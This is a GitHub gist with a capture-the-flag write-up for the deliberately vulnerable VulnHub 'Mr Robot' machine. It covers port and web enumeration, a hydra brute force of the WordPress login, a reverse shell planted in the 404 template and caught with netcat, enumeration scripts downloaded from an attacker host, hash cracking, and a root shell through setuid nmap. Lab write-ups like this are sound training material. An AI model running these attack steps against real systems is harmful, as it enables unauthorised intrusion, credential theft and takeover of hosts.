Skip to content

Instantly share code, notes, and snippets.

@comradecheese

comradecheese/MrRobot.md

Created September 12, 2021 05:44
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save comradecheese/4538b95a6a75720b4aa0a7f04f6e56c8 to your computer and use it in GitHub Desktop.
Save comradecheese/4538b95a6a75720b4aa0a7f04f6e56c8 to your computer and use it in GitHub Desktop.
Download ZIP
VulnHub write-up for the MrRobot machine.
Raw
MrRobot.md

Mr Robot

VulnHub

Enumeration

Start port scanning and enumerating services.

# check if the box is up
ping <target-ip>

# run initial nmap scan
sudo nmap -sS -T4 <target-ip> -oN nmap/init

# run a service scan
sudo nmap -sV -p 22,80,443 -T4 <target-ip> -oN nmap/service
...
PORT    STATE  SERVICE  REASON         VERSION
22/tcp  closed ssh      reset ttl 64
80/tcp  open   http     syn-ack ttl 64 Apache httpd
443/tcp open   ssl/http syn-ack ttl 64 Apache httpd

#run script scan
nmap -Pn -p 22,80,443 --script default,vuln <target-ip> -oN nmap/scripts
...
| http-enum: 
|   /admin/: Possible admin folder
|   /admin/index.html: Possible admin folder
|   /wp-login.php: Possible admin folder
|   /robots.txt: Robots file
|   /feed/: Wordpress version: 4.3.1
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|   /readme.html: Interesting, a readme.
|   /0/: Potentially interesting folder
|_  /image/: Potentially interesting folder

It appears to be an Apache webserver, possibly running Wordpress. Continue enumerating HTTP to confirm this.

# enumerate http 
gobuster dir -u http://<target-ip>/ -w /usr/share/wordlists/dirb/common.txt -x txt,html,php -o gobuster.common
...
/robots.txt           (Status: 200) [Size: 41]
/wp-login             (Status: 200) [Size: 2657]

nikto -h http://<target-ip>/ -Format=txt -o nikto
...
+ GET Cookie wordpress_test_cookie created without the httponly flag
+ GET /wp-login/: Admin login page/section found.
+ GET /wordpress: A Wordpress installation was found.
+ GET /wp-admin/wp-login.php: Wordpress login found
+ GET /wordpresswp-admin/wp-login.php: Wordpress login found
+ GET /blog/wp-login.php: Wordpress login found
+ GET /wp-login.php: Wordpress login found
+ GET /wordpresswp-login.php: Wordpress login found

wpscan --url http://<target-ip>/ -e vp 
...
[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).
 | Found By: Rss Generator (Aggressive Detection)
 |  - http://<target-ip>/feed/, <generator>http://wordpress.org/?v=4.3.1</generator>
 |  - http://<target-ip>/comments/feed/, <generator>http://wordpress.org/?v=4.3.1</generator>

There is a few interesting entries in robots.txt.

# view robots.txt
curl http://<target-ip>/robots.txt
...
User-agent: *
fsocity.dic
key-1-of-3.txt

# grab both the files
wget http://<target-ip>/key-1-of-3.txt
wget http://<target-ip>/fsocity.dic

The text file is a flag and the fsocity.dic appears to be a wordlist. Enumerate the Wordpress user name with the found wordlist.

# sort and remove duplicates in wordlist
sort fsocity.dic | uniq > fsocity.dic.uniq

# enumerate wp-login user
hydra -L fsocity.dic.uniq -p blah <target-ip> http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
...
[80][http-post-form] host: <target-ip>   login: Elliot   password: blah

# bruteforce login
hydra -l Elliot -P fsocity.dic.uniq <target-ip> http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'
...
[80][http-post-form] host: <target-ip>   login: Elliot   password: ER28-0652

Enumeration Loot

key-1-of-3.txt:073403c8a58a1f80d943455fb30724b9  
Elliot:ER28-0652

Exploitation

Log into Wordpress and modify the 404 template (404.php) and replace contents with php reverse shell.

# setup a listner on attacking machine and navigate to non existent URL in browser
netcat -lvnp 8001

# stabilise captured shell
python3 -c 'import pty;pty.spawn("/bin/sh")'
export TERM=xterm

# background shell with Ctrl + Z
sudo stty raw -echo; fg

# search /home/robot to reveal the second flag location
ls -la /home/robot
...
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5

Flag file needs a higher permission to view and password.raw-md5 appears to be a password hash. Upload linpeas and or LinEnum to target machine.

# on attacking machine serve LinEnum.sh
python3 -m http.server 8080

# on target download linpeas.sh and make executable
wget http://<attack-ip>:8080/LinEnum.sh
wget http://<attack-ip>:8080/linpeas.sh

chmod +x LinEnum.sh
chmod +x linpeas.sh

./LinEnum.sh

./linpeas.sh
...
[+] nmap is available for network discover & port scanning, you should use it yourself
...
-rwsr-xr-x 1 root root 493K Nov 13  2015 /usr/local/bin/nmap

Using the found hash, escalate privileges.

# on the attacking machine crack found hash with john
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt password.raw-md5

# log into robot
su robot

We can use nmap to spawn a root shell as per GTFOBins.

# escalate to root using nmap
nmap --interactive
nmap> !sh

Exploitation Loot

robot:abcdefghijklmnopqrstuvwxyz  
key-2-of-3.txt:822c73956184f694993bede3eb39f959  
key-3-of-3.txt:04787ddef27c3dee1ee161b21670b4e4
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment